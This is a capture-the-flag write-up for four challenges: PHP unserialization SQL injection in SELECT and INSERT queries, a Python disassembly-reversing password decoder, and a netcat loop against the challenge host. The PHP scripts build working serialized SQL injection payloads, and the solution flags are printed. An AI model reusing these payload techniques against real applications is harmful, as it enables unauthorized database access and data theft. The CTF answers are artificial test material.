Injection1:

easy SQL injection throught php unserialization

<?php
$r=unserialize(base64_decode("YToyOntzOjg6InBhc3N3b3JkIjtzOjU6Imd1ZXN0IjtzOjI6ImlkIjtpOjE7fQ=="));
$r["password"]="guest";
$r["id"]="0 union select flag from web50_flag";
echo urlencode(base64_encode(serialize($r)))."\n";
//0x3004{SQLi_thr0ugh_53r141iz3}
?>

Injection2:

another easy SQL injection throught unserialization but this time in INSERT query.

<?php

class WriteLog{
public $time = '';
public $password='guest';
public $id=1;
// Constructor
function __construct($time){
$this->time = $time;
}
// Destructor
function __destruct(){
}
}
//0x3004{php_0bj3ct_m4k35_1t_3a5y}
$log =Array("password"=> new WriteLog("888',0),(null,(select flag from web100_flag ),'pvdttpn04vpos24k0klhcmdke5')-- -"),"id"=>1);

echo urlencode(base64_encode(serialize($log)))."\n";
//echo serialize($log)."\n";
?>

pydis:

in this challenge an output is provided. The output is obtained disassembling a “check_password” function. Rebuilding it was easy and fast then it comes the reversing one:

PASS_ENCODED=[12313,12304,12313,12294,12342,12351,12297,12318,12328,12338,12288,12313,12315,12313,12290,12335,12317,12334,12380,12407,12350]    tmp='{'
pwd=""
for i in range(0,len(PASS_ENCODED)):
for j in range(32,127):
if PASS_ENCODED[i]^12292==ord(tmp)^j:
tmp=chr(j)
pwd+=tmp
break
print pwd
#from_dis_import_Fl4G

The Heart Still Bleed:

just loop on the host echoing to the stdin of the server “1024” which will lead you after a while to the flag:

while true;do perl -e 'print "1024\n"' | nc 23.98.66.138 3333 ; done

Razor4x